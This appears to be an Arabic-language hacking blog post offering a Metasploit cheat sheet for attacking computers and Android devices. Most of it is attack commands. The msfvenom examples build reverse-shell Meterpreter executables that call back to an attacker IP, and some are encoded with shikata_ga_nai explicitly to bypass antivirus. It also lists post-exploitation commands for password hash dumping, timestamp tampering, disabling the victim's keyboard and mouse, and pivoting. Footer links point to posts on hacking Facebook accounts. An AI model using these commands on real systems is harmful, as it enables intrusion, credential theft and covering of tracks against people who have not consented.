مشروع اختبار الاختراق في Metasploit لي الكمبيوتر والاندرويد

 


مشروع Metasploit هو مشروع أمان كمبيوتر يوفر معلومات عن نقاط الضعف ، ويساعد في تطوير اختبارات الاختراق وتوقيعات نظام كشف التسلل.


Metasploit هي أداة شائعة يستخدمها خبراء pentest. لقد أعددت وثيقة لتتعلمها.


ميتاسبلويت:

البحث عن وحدة:

msf > search [regex]

حدد واستغل لاستخدام:

msf > use exploit/[ExploitPath]

حدد حمولة لاستخدامها:

msf > set PAYLOAD [PayloadPath]

إظهار الخيارات للوحدات النمطية الحالية:

msf > show options

ضبط الخيارات:

msf > set [Option] [Value]

ابدأ الاستغلال:

msf > exploit 

وحدات مساعدة مفيدة

ماسح المنفذ:

msf > use auxiliary/scanner/portscan/tcp

msf > set RHOSTS 10.10.10.0/24

msf > run

تعداد DNS:

msf > use auxiliary/gather/dns_enum

msf > set DOMAIN target.tgt

msf > run

خادم بروتوكول نقل الملفات:

msf > use auxiliary/server/ftp

msf > set FTPROOT /tmp/ftproot

msf > run

مخدم بروكسي:

msf > use auxiliary/server/socks4

msf > run 

msfvenom:

يمكن استخدام أداة msfvenom لإنشاء حمولات Metasploit (مثل Meterpreter) كملفات قائمة بذاتها وترميزها اختياريًا. تحل هذه الأداة محل أدوات msfpayload و msfencode السابقة. قم بتشغيل "-l payloads" للحصول على قائمة الحمولات.


$ msfvenom –p [PayloadPath]

–f [FormatType]

LHOST=[LocalHost (if reverse conn.)]

LPORT=[LocalPort]

مثال :


عكس الحمولة كملف قابل للتنفيذ وإعادة توجيهه إلى ملف:


$ msfvenom -p windows/meterpreter/

reverse_tcp -f exe LHOST=10.1.1.1

LPORT=4444 > met.exe

خيارات التنسيق (المحددة بـ –f) - تنسيقات المساعدة - سرد تنسيقات الإخراج المتاحة


exe - قابل للتنفيذ pl - Perl rb - Ruby raw - كود قشرة خام c - كود C


ترميز الحمولات مع msfvenom


يمكن استخدام أداة msfvenom لتطبيق مستوى من الترميز لتجاوز مكافحة الفيروسات. استخدم "-l encoders" للحصول على قائمة من برامج التشفير.


$ msfvenom -p [Payload] -e [Encoder] -f

[FormatType] -i [EncodeInterations]

LHOST=[LocalHost (if reverse conn.)]

LPORT=[LocalPort]

مثال


قم بترميز حمولة من msfpayload 5 مرات باستخدام تشفير shikata-ga-nai وإخراجها كقابلة للتنفيذ:


$ msfvenom -p windows/meterpreter/

reverse_tcp -i 5 -e x86/shikata_ga_nai -f

exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Meterpreter

أوامر القاعدة:

؟ / help: عرض ملخص للأوامر exit / quit: قم بإنهاء جلسة Meterpreter


sysinfo: إظهار اسم النظام ونوع نظام التشغيل


إيقاف التشغيل / إعادة التشغيل: واضح بذاته


أوامر نظام الملفات:


cd: تغيير الدليل


lcd: قم بتغيير الدليل على الجهاز المحلي (المهاجم)


pwd / getwd: عرض دليل العمل الحالي


ls: إظهار محتويات الدليل


: قم بعرض محتويات الملف على الشاشة


تنزيل / تحميل: انقل الملفات إلى / من الجهاز الهدف


mkdir / rmdir: إنشاء / إزالة الدليل


تحرير: فتح ملف في المحرر الافتراضي (عادة السادس)


أوامر العملية:


getpid: عرض معرّف العملية الذي يعمل Metpreter بداخله.


getuid: عرض معرف المستخدم الذي يعمل به Meterpreter.


ملاحظة: عرض قائمة العمليات.


kill: إنهاء العملية بناءً على معرف العملية الخاص بها.


تنفيذ: قم بتشغيل برنامج معين بامتيازات العملية التي تم تحميل Meterpreter فيها.


الترحيل: انتقل إلى معرّف عملية الوجهة المحدد


يجب أن يكون للعملية المستهدفة نفس الامتيازات أو امتيازات أقل


قد تكون العملية المستهدفة عملية أكثر استقرارًا


عندما تكون داخل عملية ، يمكنك الوصول إلى أي ملفات تم قفلها.


أوامر الشبكة:

ipconfig: إظهار معلومات واجهة الشبكة


portfwd: إعادة توجيه الحزم من خلال جلسة TCP


الطريق: إدارة / عرض جدول توجيه النظام


أوامر متنوعة:

idletime: عرض مدة خمول واجهة المستخدم الرسومية للجهاز المستهدف.


uictl [تمكين / تعطيل] [لوحة المفاتيح / الماوس]: تمكين / تعطيل الماوس أو لوحة المفاتيح للجهاز الهدف.


لقطة الشاشة: احفظ كصورة لقطة شاشة للجهاز المستهدف.


وحدات إضافية:

استخدم [module]: قم بتحميل الوحدة النمطية المحددة


مثال:


use priv: تحميل الوحدة الخاصة


hashdump: تفريغ التجزئة من الصندوق


timestomp: تعديل الطوابع الزمنية لملف NTFS


إدارة الجلسات

الاستغلال المتعدد:

قم بتشغيل الاستغلال متوقعًا جلسة واحدة تكون في الخلفية على الفور:


msf > exploit -z

قم بتشغيل استغلال في الخلفية وتوقع جلسة واحدة أو أكثر يتم إخفاؤها على الفور:


msf > exploit –j

قائمة بجميع الوظائف الحالية (عادة ما تستغل المستمعين):

msf > jobs –l

اقتل وظيفة:

msf > jobs –k [JobID]

جلسات متعددة:

قائمة بجميع الجلسات الخلفية:

msf > sessions -l

التفاعل مع جلسة خلفية:

msf > session -i [SessionID]

خلفية الجلسة التفاعلية الحالية:

meterpreter > <Ctrl+Z>

or

meterpreter > background

التوجيه من خلال الجلسات:

ستتم محاورة جميع الوحدات (عمليات استغلال / post / aux) مقابل قناع الشبكة الفرعية الهدف خلال هذه الجلسة.


msf > route add [Subnet to Route To]

[Subnet Netmask] [SessionID]



تعليقات

المشاركات الشائعة من هذه المدونة

اختراق حسابات الفيسبوك عن طريق التخمين

كيف تصنع من الشبكات الذي تطلب تسجيل دخول وصنع ملايئن الكروت

أوامر اختراق الموقع عن طريق اداة SQLMAP لاستغلال حقن SQL